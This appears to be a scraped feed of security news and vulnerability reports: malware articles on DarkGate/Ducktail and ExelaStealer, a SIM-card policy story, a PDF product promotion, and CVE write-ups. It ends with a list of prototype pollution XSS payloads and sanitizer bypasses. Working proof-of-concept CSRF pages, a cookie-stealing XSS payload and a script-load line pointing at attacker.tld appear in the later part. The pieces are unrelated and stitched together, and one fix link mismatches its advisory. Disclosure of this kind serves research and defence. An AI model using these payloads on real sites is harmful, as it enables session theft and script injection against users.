Vietnamese cybercrime groups are using multiple different MaaS infostealers and RATs to target the digital marketing sector.

Cybersecurity researchers have uncovered a connection between the notorious DarkGate remote access trojan (RAT) and the Vietnam-based financial cybercrime operation behind the Ducktail infostealer.

WithSecure's researchers, who spotted Ducktail's activity in 2022, started their investigation into DarkGate after detecting multiple infection attempts against organizations in the UK, US, and India.

"It rapidly became apparent that the lure documents and targeting were very similar to recent Ducktail infostealer campaigns, and it was possible to pivot through open source data from the DarkGate campaign to multiple other infostealers which are very likely being used by the same actor/group," the report noted.

**DarkGate's Ties to Ducktail**

DarkGate is backdoor malware capable of a wide range of malicious activities, including information stealing, cryptojacking, and using Skype, Teams, and Messages to distribute malware.

The malware can steal a variety of data from infected devices, including usernames, passwords, credit card numbers, and other sensitive information and be used to mine cryptocurrency on infected devices without the user's knowledge or consent.

It can be used to deliver ransomware to infected devices, encrypting the user's files and demanding a ransom payment to decrypt them.

WithSecure senior threat intelligence analyst Stephen Robinson explains that at a high level, DarkGate malware functionality hasn’t changed since the initial reporting in 2018.

"It has always been a Swiss-army knife, multifunctional malware," he says. "That said, it has been repeatedly updated and modified by the author since then, which we can assume has been to improve the implementation of those malicious functions, and to keep up with the AV/Malware detection arms race."

He notes DarkGate campaigns (and the actors behind them) can be differentiated by who they are targeting, the lures and infection vectors they are using, and their actions on the target.

"The specific Vietnamese cluster that the report focuses on used the same targeting, file names, and even lure files for multiple campaigns using multiple strains of malware," Robinson says.

They created PDF lure files using an online service that adds its own metadata to each file created; that metadata gave further strong links between the different campaigns.

They also created multiple malicious LNK files on the same device and did not wipe the metadata, enabling further activity to be clustered.

The correlation between DarkGate and Ducktail was determined from nontechnical markers such as lure files, targeting patterns, and delivery methods, collated in a 15-page report.

"Nontechnical indicators like lure files and metadata are highly impactful forensic cues. Lure files, which act as bait to entice victims into executing the malware, offer invaluable insights into an attacker's modus operandi, their potential targets, and their evolving techniques," explains Callie Guenther, senior manager of cyber threat research at Critical Start.

Similarly, metadata — information like "LNK Drive ID" or details from services like Canva — can leave discernible traces or patterns that might persist across different attacks or specific actors.

"These consistent patterns, when analyzed, can bridge the gap between varied campaigns, enabling researchers to attribute them to a common perpetrator, even if the malware's technical footprint differs," she says.

Ngoc Bui, cybersecurity expert at Menlo Security, says understanding the relationships between different malware families linked to the same threat actors is essential.

"It helps in building a more comprehensive threat profile and identifying the tactics and motivations of these threat actors," Bui says.

For example, if researchers find connections between DarkGate, Ducktail, Lobshot, and Redline Stealer, they may be able to conclude that a single actor or group is involved in multiple campaigns, which suggests a high level of sophistication.

"It may also help analysts determine if more than one threat group is working together as we see with ransomware campaigns and efforts," Bui adds.

**MaaS Impacts Cyber-Threat Landscape**

Bui points out the availability of DarkGate as a service has significant implications for the cybersecurity landscape.

"It lowers the entry barrier for aspiring cybercriminals who may lack technical expertise," Bui explains. "As a result, more individuals or groups can access and deploy sophisticated malware like DarkGate, increasing the overall threat level."

Bui adds that malware-as-a-service (MaaS) offerings provide cybercriminals with a convenient and cost-effective means to conduct attacks.

For a cybersecurity analyst, this poses a challenge because they must continually adapt to new threats and consider the possibility of multiple threat actors using the same malware service.

It also can make tracking the threat actor using the malware a little more difficult as the malware itself may cluster back to the developer and not the threat actor using the malware.

**Paradigm Shift in Defense**

Guenther says that to better comprehend the modern, ever-evolving cyber-threat landscape, a paradigm shift in defense strategies is overdue.

"Embracing behavior-based detection sequences, as well as leveraging AI and ML, allows for the identification of anomalous network behaviors, surpassing the previous limitations of signature-based methods," she says.

Furthermore, pooling threat intelligence and fostering communication about emergent threats and tactics across industry verticals can catalyze early detection and mitigation.

"Regular audits, encompassing network configurations and penetration tests, can preemptively unearth vulnerabilities," Guenther adds. "Moreover, a well-informed workforce, trained in recognizing contemporary threats and phishing vectors, becomes an organization's first line of defense, reducing the risk quotient substantially."

Ducktail Infostealer, DarkGate RAT Linked to Same Threat Actors

Users could hold up to five SIM cards previously, but now they can only have two; it's a move that the government says is intended to cut down mobile spam levels.

Burkina Faso aims to increase mobile security in the African country with a new bill that says users can only hold two SIM cards (i.e., lines of service) from a mobile provider.

And the sale of SIM cards will only be made in approved agencies and points of sale.

The use of multiple SIM cards can allow for SIM farms to be built, which are typically connected to organizations where the SIM cards are connected to computer servers to send large amounts of SMS spam.

Aminata Zerbo-Sabané, Burkina Faso's Minister of Digital Transition, Posts, and Electronic Communications, said this measure is aimed at reducing the improper use of electronic communication services.

The bill will better regulate the identification of customers of electronic communications service providers, and reduce the illicit use of mobile services, she said.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

SIM Card Ownership Slashed in Burkina Faso

By Waqas
Another day, another malware threat against Windows devices and users!
This is a post from HackRead.com Read the original post: New Windows Infostealer ‘ExelaStealer’ Being Sold on Dark Web

Be cautious of the newly advertised ExelaStealer infostealer malware, now making the rounds on dark web forums and Telegram. Its primary aim is to target Windows-based devices.

****_KEY FINDINGS_****

**FortiGuard Labs has discovered a new infostealer in the cybercrime landscape called ExelaStealer mostly targeting Windows device**s.

**The infostealer is written in Python but uses resources in many different languages when required.**

**The malware deployment entails a decoy PDF file and executing obfuscated Python code.**

**It can steal sensitive user data, including session data and cookies, credit card details, passwords, and keystrokes.**

**It can collect extensive system data, including WLAN profiles and firewall status.**

**ExelaStealer is available in open-source and paid versions on the Dark web. The paid version comes with additional customization features.**

****ExelaStealer** uses code obfuscation techniques to block analysis and reverse engineering efforts.**

We have seen many infostealing malware emerging in cyberspace including Raccoon, RedLine, Vidar, and the relatively new entrant ThirdEye. However, the buzz in the cybersecurity world is that the yet-unknown ExelaStealer is far more dangerous than these.

The cybersecurity researchers at FortiGuard Labs discovered ExelaStealer in August 2023 and provided a detailed account of ExelaStealer’s workings in its new blog post. Per its research, the infostealer is offered as open-source and paid versions on the dark web, with the paid one featuring extended capabilities.

The malware is written in Python but often uses other language resources such as JavaScript. Windows-based systems are its key targets, whereas the malware looks for sensitive data such as passwords, session data, cookies, keystrokes, and credit card details.

Both versions of ExelaStealer are advertised on Dark Web forums with all the ads posted by a single contact using the handle “quicaxd.” For the paid version, the pricing structure varies. A monthly subscription is offered at $20, a three-month subscription is $45, and a lifetime subscription is $120.

It is worth noting that, according to FortiGuard Lab’s report, an active Telegram channel is used for facilitating purchases and getting access to the GitHub repository for the open-source version.

Given the infostealer’s open-source feature, it is possible for anyone with basic programming skills to create their own binaries using its source code. At the moment, ExelaStealer’s packaging and configuration are such that they can only affect Windows systems.

As per Fortiguard Labs, the binaries they analyzed have been released as part of a specific campaign, and the involvement of a decoy document further supports this assumption.

Researchers couldn’t identify the initial attack vector, but they suspect it could be achieved through malware deployment, watering holes, or phishing attacks. The binary is the attack’s first stage, which spawns an executable (sirket-ruhsat-pdf.exe) and launches a PDF viewer to display a decoy document titled ‘BNG 824 ruhsat.pdf’ to the user. Sirket-ruhsat-pdf.exe and BNG 824 ruhsat.pdf are planted into the C: drive’s root directory in which the former is a PyInstaller-generated file while the latter is a decoy file.

Regarding the attack stages, FortiGuard Labs researchers noted that the malware’s core functionality is embedded in a file titled Exela.py. The build process starts with a batch file that invokes Python and the ‘build.py’ file. The builder then uses a file titled ‘obf.py’ to hide the infostealer’s code and evade detection, reverse engineering, and analysis efforts.

Except for the library components, the obfuscated code is consolidated into a file titled ‘Obfuscated.py’ which is then deployed. The malware then starts gathering data along with executing a base64-encoded PowerShell command. The information is sent to the attacker’s Telegram channel, where the files are packaged into a ZIP archive and sent to a Discord webhook.

****Look out for Watering Hole and Phishing Attacks****

To protect yourself from ExelaStealer, users need to be on the lookout for watering holes and phishing attacks. A watering hole attack is a type of cyberattack in which the attacker identifies and compromises a website that is frequented by a particular group of individuals or organizations.

The goal of this attack is to infect the visitors’ computers with malware or exploit vulnerabilities in their systems. The term “watering hole” is derived from the concept of predators waiting near watering holes in the wild to ambush their prey when they come to drink.

To protect against watering hole attacks, individuals and organizations should regularly update their software, use strong security measures, and be cautious when visiting websites, especially those that might be of interest to potential attackers. Additionally, security solutions that can detect and block malicious activity are essential for identifying and mitigating such attacks.

****_**_KEY FINDINGS_**_****

1.  Formbook Takes the Throne as Most Prevalent Malware
2.  New version of Jupyter infostealer delivered through MSI installer
3.  Fake ChatGPT and AI pages on Facebook are spreading infostealers

New Windows Infostealer ‘ExelaStealer’ Being Sold on Dark Web

Heap-based Buffer Overflow in GitHub repository radareorg/radare2 prior to 5.9.0.

**Description**

heap-buffer-overflow in /radare2/shlr/java/code.c:211:21 in java\_print\_opcode

**Version**

    $ r2  -v
    radare2 5.8.9 31339 @ linux-x86-64
    birth: git.5.8.8-691-gb2de2288d8 2023-10-17__01:18:28
    commit: b2de2288d8299f89288c503fc2ce22381b61aba0
    

**Platform**

    $ uname -a
    Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
    

**Asan**

    [31mERROR:[0m Invalid tag '83' at offset 0x00000047
    [31mERROR:[0m Unable to parse class Attribute len (0x24020007) + offset (0x25b) exceeds length of buffer (0x5878)
    [31mERROR:[0m unable to parse remainder of classfile after Method Attribute: 0
    [31mERROR:[0m Unable to parse class Attribute len (0x47608fc2) + offset (0x255) exceeds length of buffer (0x5878)
    [33mINFO:[0m Analyze all flags starting with sym. and entry0 (aa)
    [33mINFO:[0m Analyze imports (af@@@i)
    [35mWARN:[0m set your favourite calling convention in `e anal.cc=?`
    [33mINFO:[0m Analyze symbols (af@@@s)
    [33mINFO:[0m Recovering variables
    [33mINFO:[0m Analyze all functions arguments/locals (afva@@@F)
    [2K
    [33mINFO:[0m Analyze function calls (aac)
    [33mINFO:[0m Analyze len bytes of instructions for references (aar)
    [33mINFO:[0m Finding and parsing C++ vtables (avrr)
    [33mINFO:[0m Analyzing methods
    [33mINFO:[0m Finding xrefs in noncode section (e anal.in=io.maps.x)
    [33mINFO:[0m Emulate functions to find computed references (aaef)
    =================================================================
    ==3433174==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000132dd2 at pc 0x7fe86fbfe09b bp 0x7fff8b14f4c0 sp 0x7fff8b14f4b8
    READ of size 1 at 0x602000132dd2 thread T0
        #0 0x7fe86fbfe09a in java_print_opcode /home/user/fuzzing_radare2/radare2/shlr/java/code.c:211:21
        #1 0x7fe86fbfe86c in r_java_disasm /home/user/fuzzing_radare2/radare2/shlr/java/code.c:309:10
        #2 0x7fe86f9fb8e6 in decode /home/user/fuzzing_radare2/radare2/libr/arch/p/java/plugin.c:215:15
        #3 0x7fe86f562c85 in r_arch_decode /home/user/fuzzing_radare2/radare2/libr/arch/arch.c:320:9
        #4 0x7fe86dc629cf in r_anal_op /home/user/fuzzing_radare2/radare2/libr/anal/op.c:186:8
        #5 0x7fe8719d718f in r_core_anal_esil /home/user/fuzzing_radare2/radare2/libr/core/canal.c:5715:8
        #6 0x7fe87182176a in cmd_anal_all /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:13183:6
        #7 0x7fe871737429 in cmd_anal /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:14267:8
        #8 0x7fe87182381f in r_core_cmd_call /home/user/fuzzing_radare2/radare2/libr/core/cmd.c:6303:9
        #9 0x7fe87182381f in cmd_anal_all /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:13042:7
        #10 0x7fe871737429 in cmd_anal /home/user/fuzzing_radare2/radare2/libr/core/./cmd_anal.inc.c:14267:8
        #11 0x7fe8725c3940 in perform_analysis /home/user/fuzzing_radare2/radare2/libr/main/radare2.c:499:2
        #12 0x7fe8725b931d in r_main_radare2 /home/user/fuzzing_radare2/radare2/libr/main/radare2.c:1720:4
        #13 0x555816ea152d in main /home/user/fuzzing_radare2/radare2/binr/radare2/radare2.c:114:9
        #14 0x7fe872229d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #15 0x7fe872229e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #16 0x555816de3444 in _start (/home/user/fuzzing_radare2/radare2/binr/radare2/radare2+0x1f444) (BuildId: 655cd64f4959101bcf192e77bc6bf062577e0708)
    
    0x602000132dd2 is located 0 bytes to the right of 2-byte region [0x602000132dd0,0x602000132dd2)
    allocated by thread T0 here:
        #0 0x555816e6628e in __interceptor_malloc (/home/user/fuzzing_radare2/radare2/binr/radare2/radare2+0xa228e) (BuildId: 655cd64f4959101bcf192e77bc6bf062577e0708)
        #1 0x7fe872764b88 in r_mem_dup /home/user/fuzzing_radare2/radare2/libr/util/mem.c:306:12
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/user/fuzzing_radare2/radare2/shlr/java/code.c:211:21 in java_print_opcode
    Shadow bytes around the buggy address:
      0x0c048001e560: fa fa fd fd fa fa fd fd fa fa 04 fa fa fa 04 fa
      0x0c048001e570: fa fa 04 fa fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c048001e580: fa fa 00 00 fa fa 00 01 fa fa 00 00 fa fa 00 01
      0x0c048001e590: fa fa 00 00 fa fa 00 01 fa fa 00 00 fa fa 00 01
      0x0c048001e5a0: fa fa 00 00 fa fa 00 01 fa fa 00 00 fa fa 00 00
    =>0x0c048001e5b0: fa fa 00 01 fa fa 04 fa fa fa[02]fa fa fa fa fa
      0x0c048001e5c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c048001e5d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c048001e5e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c048001e5f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c048001e600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==3433174==ABORTING
    

**Reproduce**

    r2 -A -q poc
    

**POC File**

https://github.com/gandalf4a/crash\_report/blob/main/radare2/r2/r2\_hbo\_211

**Credit**

    Gandalf4a
    

**Impact**

This vulnerability allows a remote attacker to cause a denial of service or even arbitrary code execution on an affected radare2 r2. Exploiting this vulnerability requires user interaction, as the target must open a malicious file.

**Occurrences**

CVE-2023-5686: heap-buffer-overflow in /radare2/shlr/java/code.c:211:21 in java_print_opcode in radare2

Cross-Site Request Forgery (CSRF) in GitHub repository mosparo/mosparo prior to 1.0.3.

**Description**

Logout CSRF is a security vulnerability where an attacker forces a user to unknowingly log out of their session by tricking them into triggering a logout request through a malicious website or link.

    GET  http://localhost:8080/logout
    

**Proof of Concept**

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost:8080/logout">
          <input type="submit" value="Submit request" />
        </form>
        <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>
    
    

The fix can be found in  
https://github.com/WeblateOrg/weblate/commit/bfa82b569114608d3fc16d2f957ee2ab696cd581

**Impact**

This vulnerability is capable of causing a user to inadvertently log out.  
For example src="<your logout link>"  
One way GET could be abused here is if a person (maybe a competitor :)) places an image tag anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out.  
Although this won't harm the user's account, it can be a big annoyance and is valid for CSRF.

CVE-2023-5687: Cross-Site Request Forgery Vulnerability in Logout Functionality in mosparo

Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.2.2.

**Description**

Logout CSRF is a security vulnerability where an attacker forces a user to unknowingly log out of their session by tricking them into triggering a logout request through a malicious website or link.

The csrftoken for the logout interface is invalid, it is recommended to change it to http post type to send the request

    GET /accounts/logout/
    

**Proof of Concept**

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="https://demo.modoboa.org/accounts/logout/">
          <input type="submit" value="Submit request" />
        </form>
        <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>
    
    

The fix can be found in  
https://github.com/WeblateOrg/weblate/commit/bfa82b569114608d3fc16d2f957ee2ab696cd581

**Impact**

This vulnerability is capable of causing a user to inadvertently log out.  
For example src="<your logout link>"  
One way GET could be abused here is if a person (maybe a competitor :)) places an image tag anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out.  
Although this won't harm the user's account, it can be a big annoyance and is valid for CSRF.

**Occurrences**

CVE-2023-5690: Cross-Site Request Forgery Vulnerability in Logout Functionality in modoboa

Cross-site Scripting (XSS) - DOM in GitHub repository modoboa/modoboa prior to 2.2.2.

Description

I noticed, your website is very secure.

But you overlooked a flaw DOM XSS.

Detail:

1 .Login with demo account.

2 .Go to the link: https://demo.modoboa.org/user/#profile/ and click Update

3 .Use burp to block proxy and inject payload in &language:

     <img+src=0+onerror=alert(document.cookie)>  
    

Proof of Concept

Video Poc

https://drive.google.com/file/d/1DpThlp36jJ7hcjGzehX4wlof3KsPux8O/view?usp=sharing

**Impact**

This security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...

CVE-2023-5688: DOM XSS in https://demo.modoboa.org/user/#profile/ in modoboa

Expand Up

@@ -30,7 +30,7 @@ TwocolsNav.prototype = {

listen: function() {

$("a.ajaxnav").click($.proxy(this.load\_section, this));

$(document).on("click", "#update", $.proxy(function(e) {

var $form \= $("form").first();

var $form \= $(e.target).closest("form");

simple\_ajax\_form\_post(e, {

formid: $form.attr("id"),

modal: false,

Expand Down

CVE-2023-5689: Merge pull request #3095 from modoboa/fix/xss_profile_form · modoboa/modoboa@d33d3cd

By Owais Sultan
As we progress further into digital life, PDF security has evolved increasingly complex.
This is a post from HackRead.com Read the original post: PDF Security – How To Keep Sensitive Data Secure in a PDF File

Dive into PDF security in the digital era and learn how tools like PDF Expert ensure data protection in electronic documents.

At present, in our digital era, protecting confidential data cannot be overstated. With an ever-increasing array of electronic documents like PDFs, protecting sensitive information has become even more critical. This article delves deep into safeguarding PDF files for confidential data — paying special consideration to PDF Expert as a leading tool in this domain.

****Understanding the Importance of PDF Security****

PDF Expert stands out as an industry leader among apps that allow you to edit pdf on iPhone and other Apple devices — offering intuitive PDF editing functions and sophisticated security measures essential for protecting confidential data.

Their universal compatibility across platforms makes PDFs the go-to document option. However, with widespread use comes responsibility in protecting confidential information, including proprietary business data, personal details, or sensitive financial information. This kind of data needs protection from being accessible by third parties.

****Utilize PDF Expert’s Power for Editing PDFs on iPhone & iPad****

PDF Expert has become renowned for its speed, reliability, and user-friendly interface. Not just limited to minor edits, PDF Expert allows users to make major alterations — editing text and adding links, redacting information, altering images, and even electronically signing documents. For business people in particular, quickly signing and sending contracts is often crucial.

****Advanced Security Features for Increased Protection****

*   **Text Recognition:** One of PDF Expert’s most impressive capabilities is Optical Character Recognition (OCR, also known as text recognition). OCR lets users recognize text from scanned documents to make searchable, highlightable, and editable text — something especially helpful when dealing with older PDFs or documents that haven’t yet been digitized.

*   **Enhance Scans:** Scanned documents from years past may not always look their best due to shadows, distortions, and other imperfections in their contents. PDF Expert’s AI-powered enhanced feature rectifies these problems so every PDF looks perfect regardless of where its origination may lie.

*   **Customization and Personalization:** PDF Expert recognizes that every user has individual requirements. Therefore, it offers customizable features that enable users to arrange their most utilized tools according to their workflow; an example of this is using multiple pens for annotations or quickly adding markup tools for fast access. These tools ensure that users can tailor this platform according to their specifications.

****Every Professional Needs the Appropriate Tool****

PDF Expert can meet the needs of educators, students, construction professionals, and managers across various industries.

****Evolution of PDF Security Solutions****

As we progress further into digital life, PDF security has evolved increasingly complex. Gone are the days when simple password protection would suffice — modern threats require advanced solutions like PDF Expert to combat them effectively.

****Encryption Is A First Line Of Defense****

Encryption is one of the cornerstones of PDF security, ensuring data contained within PDF documents remains unreadable to unauthorized users. Only those possessing a valid decryption key (typically a password) may access its contents; PDF Expert employs advanced algorithms for encryption that ensure your documents remain hidden from prying eyes.

****Redaction: Removing Sensitive Data****

At times, certain parts of a document need to be shared while keeping other sections — which contain sensitive data — confidential. With PDF Expert, redacting information is a seamless process that ensures once data has been redacted, it’s gone for good.

****Digital Signatures Provide Authenticity and Integrity Protection****

When PDF Expert is used to sign PDFs digitally, recipients receive assurances that documents have not been modified while also verifying the signer(s) identity.

****Access Control: Directing Who Views What****

PDF Expert’s features allow document creators to set user permissions, enabling you to determine who can view, edit, print, or copy from their PDF document — providing finely controlled access that ensures even though someone might possess your file, they might not necessarily gain full access.

****Keep Current With Threats With Regular Updates: Staying Abreast****

As digital threats emerge regularly, PDF Expert ensures its software is regularly updated with security patches to stay ahead of them and give its customers access to the safest version possible. PDF Expert’s software updates deliver new features and patch potential vulnerabilities for a safer experience. So, users always receive the safest versions possible of its applications.

****PDF Security and Compliance****

Compliance with data protection regulations has become essential across industries. PDF security has to comply with various regulations, ranging from compliance with trading and investment banking regulations to compliance with regulations like Europe’s General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA), which mandate stringent data security measures for many organizations such as trading.

****How PDFs Fit Into Digital Workflows****

PDFs are indispensable in digital collaboration across various spheres — from contract negotiations to research. With increased reliance on PDF documents comes increased responsibility for maintaining their security at every point during their lifespan. PDF Expert’s suite of tools is tailored specifically towards this responsibility, guaranteeing documents remain protected whether in transit, at rest, or actively edited by staff members.

****Education of the Masses: Awareness Is Required****

PDF Expert provides advanced security features, but humans remain an insecure link in any security network. Therefore, users must be educated on the significance of PDF security best practices, including sharing unprotected documents without first understanding the risks involved, regularly updating software applications, and the need for unique passwords when encrypted.

****Future of PDF Security Solutions****

As technology progresses, so will the methods utilized by malicious actors. Artificial Intelligence, Quantum Computing, and other innovative solutions may present new risks to PDF security. However, with continuous innovation and commitment to staying ahead of the curve, tools like PDF Expert are prepared to face these threats head-on and provide robust protection.

****Accept Feedback and Improve continuously****

PDF Expert, as a user-centric tool, regularly solicits feedback from its user community to meet both current needs and anticipate any upcoming challenges and requirements. By regularly soliciting user input through this feedback loop, PDF Expert ensures it remains current while anticipating any foreseeable challenges or needs in its response to users.

****Conclusion****

PDF security in our increasingly digital world cannot be stressed enough. As physical and digital realms continue to merge, software providers and users must prioritize data protection. PDF Expert is leading this charge so we can hope for a future where our digital documents are as safe as their physical equivalents.

****_RELATED ARTICLES_****

1.  Editing Text in a PDF File
2.  Top 7 PDF Tools to Edit, Merge/Split and Protect PDF
3.  MalDoc in PDF Attack: Hackers Hiding Malicious Word Files within PDFs

PDF Security – How To Keep Sensitive Data Secure in a PDF File

The Your Journey theme for WordPress is vulnerable to Reflected Cross-Site Scripting via prototype pollution in versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

**Client-Side Prototype Pollution****Intro**

If you are unfamiliar with Prototype Pollution Attack, you should read the following first:  
JavaScript prototype pollution attack in NodeJS by Olivier Arteau  
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski

In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact.

**Prototype Pollution**

Name

Payload

Refs

Found by

Wistia Embedded Video (**Fixed**)

?__proto__[test]=test  
?__proto__.test=test

\[1\]

William Bowling

jQuery query-object plugin  
CVE-2021-20083

?__proto__[test]=test  
#__proto__[test]=test

Sergey Bobrov

jQuery Sparkle  
CVE-2021-20084

?__proto__.test=test  
?constructor.prototype.test=test

Sergey Bobrov

V4Fire Core Library

?__proto__.test=test  
?__proto__[test]=test  
?__proto__[test]={"json":"value"}

Sergey Bobrov

backbone-query-parameters  
CVE-2021-20085

?__proto__.test=test  
?constructor.prototype.test=test  
?__proto__.array=1|2|3

\[1\]

Sergey Bobrov

jQuery BBQ  
CVE-2021-20086

?__proto__[test]=test  
?constructor[prototype][test]=test

Sergey Bobrov

jquery-deparam  
CVE-2021-20087

?__proto__[test]=test  
?constructor[prototype][test]=test

Sergey Bobrov

MooTools More  
CVE-2021-20088

?__proto__[test]=test  
?constructor[prototype][test]=test

Sergey Bobrov

Swiftype Site Search (**Fixed**)

#__proto__[test]=test

\[1\]

s1r1us

CanJS deparam

?__proto__[test]=test  
?constructor[prototype][test]=test

Rahul Maini

Purl (jQuery-URL-Parser)  
CVE-2021-20089

?__proto__[test]=test  
?constructor[prototype][test]=test  
#__proto__[test]=test

Sergey Bobrov

HubSpot Tracking Code (**Fixed**)

?__proto__[test]=test  
?constructor[prototype][test]=test  
#__proto__[test]=test

Sergey Bobrov

YUI 3 querystring-parse

?constructor[prototype][test]=test

Sergey Bobrov

Mutiny (**Fixed**)

?__proto__.test=test

SPQR

jQuery parseParams

?__proto__.test=test  
?constructor.prototype.test=test

POSIX

php.js parse\_str

?__proto__[test]=test  
?constructor[prototype][test]=test

POSIX

arg.js

?__proto__[test]=test  
?__proto__.test=test  
?constructor[prototype][test]=test  
#__proto__[test]=test

POSIX

davis.js

?__proto__[test]=test

POSIX

Component querystring

?__proto__[NUMBER]=test  
?__proto__[123]=test

Masato Kinugawa

Aurelia path

?__proto__[test]=test

\[1\]

s1r1us

analytics-utils < 1.0.3

?__proto__[test]=test  
?constructor[prototype][test]=test

\[1\]

alexdaviestray

**Script Gadgets**

Name

Payload

Impact

Refs

Found by

Wistia Embedded Video

?__proto__[innerHTML]=<img/src/onerror%3dalert(1)>

XSS

\[1\]

William Bowling

jQuery $.get

?__proto__[context]=<img/src/onerror%3dalert(1)>  
&__proto__[jquery]=x

XSS

Sergey Bobrov

jQuery $.get >= 3.0.0  
Boolean.prototype

?__proto__[url][]=data:,alert(1)//  
&__proto__[dataType]=script

XSS

Michał Bentkowski

jQuery $.get >= 3.0.0  
Boolean.prototype

?__proto__[url]=data:,alert(1)//  
&__proto__[dataType]=script  
&__proto__[crossDomain]=

XSS

Sergey Bobrov

jQuery $.getScript >= 3.4.0

?__proto__[src][]=data:,alert(1)//

XSS

s1r1us

jQuery $.getScript 3.0.0 - 3.3.1  
Boolean.prototype

?__proto__[url]=data:,alert(1)//

XSS

s1r1us

jQuery $(html)

?__proto__[div][0]=1  
&__proto__[div][1]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

jQuery $(x).off  
String.prototype

?__proto__[preventDefault]=x  
&__proto__[handleObj]=x  
&__proto__[delegateTarget]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

Google reCAPTCHA

?__proto__[srcdoc][]=<script>alert(1)</script>

XSS

s1r1us

Twitter Universal Website Tag (**Fixed**)

?__proto__[hif][]=javascript:alert(1)

XSS

Sergey Bobrov

Tealium Universal Tag

?__proto__[attrs][src]=1  
&__proto__[src]=data:,alert(1)//

XSS

Sergey Bobrov

Akamai Boomerang

?__proto__[BOOMR]=1  
&__proto__[url]=//attacker.tld/js.js

XSS

s1r1us

Lodash <= 4.17.15

?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)

XSS

\[1\]

Alex Brasetvik

sanitize-html

?__proto__[*][]=onload

Bypass

\[1\]

Michał Bentkowski

sanitize-html

?__proto__[innerText]=<script>alert(1)</script>

Bypass

\[1\]

Hpdoger

js-xss

?__proto__[whiteList][img][0]=onerror  
&__proto__[whiteList][img][1]=src

Bypass

\[1\]

Michał Bentkowski

DOMPurify <= 2.0.12

?__proto__[ALLOWED_ATTR][0]=onerror  
&__proto__[ALLOWED_ATTR][1]=src

Bypass

\[1\]

Michał Bentkowski

DOMPurify <= 2.0.12

?__proto__[documentMode]=9

Bypass

\[1\]

Michał Bentkowski

Google Closure

?__proto__[*%20ONERROR]=1  
&__proto__[*%20SRC]=1

Bypass

\[1\]

Michał Bentkowski

Google Closure

?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//

XSS

\[1\]

Michał Bentkowski

Marionette.js / Backbone.js

?__proto__[tagName]=img  
&__proto__[src][]=x:  
&__proto__[onerror][]=alert(1)

XSS

Sergey Bobrov

Adobe Dynamic Tag Management

?__proto__[src]=data:,alert(1)//

XSS

Sergey Bobrov

Adobe Dynamic Tag Management

?__proto__[SRC]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

Swiftype Site Search

?__proto__[xxx]=alert(1)

XSS

s1r1us

Embedly Cards

?__proto__[onload]=alert(1)

XSS

Guilherme Keerok

Segment Analytics.js

?__proto__[script][0]=1  
&__proto__[script][1]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

Knockout.js  
Array.prototype

?__proto__[4]=a':1,[alert(1)]:1,'b  
&__proto__[5]=,

XSS

Michał Bentkowski

Zepto.js

?__proto__[onerror]=alert(1)

XSS

\[1\]

lih3iu

Zepto.js

?__proto__[html]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

Sprint.js

?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)>

XSS

\[1\]

lih3iu

Vue.js

?__proto__[v-if]=_c.constructor('alert(1)')()

XSS

POSIX

Vue.js

?__proto__[attrs][0][name]=src  
&__proto__[attrs][0][value]=xxx  
&__proto__[xxx]=data:,alert(1)//  
&__proto__[is]=script

XSS

\[1\]

s1r1us

Vue.js

?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()

XSS

\[1\]

r00timentary

Vue.js

?__proto__[data]=a  
&__proto__[template][nodeType]=a  
&__proto__[template][innerHTML]=<script>alert(1)</script>

XSS

\[1\]

SuperGuesser

Vue.js

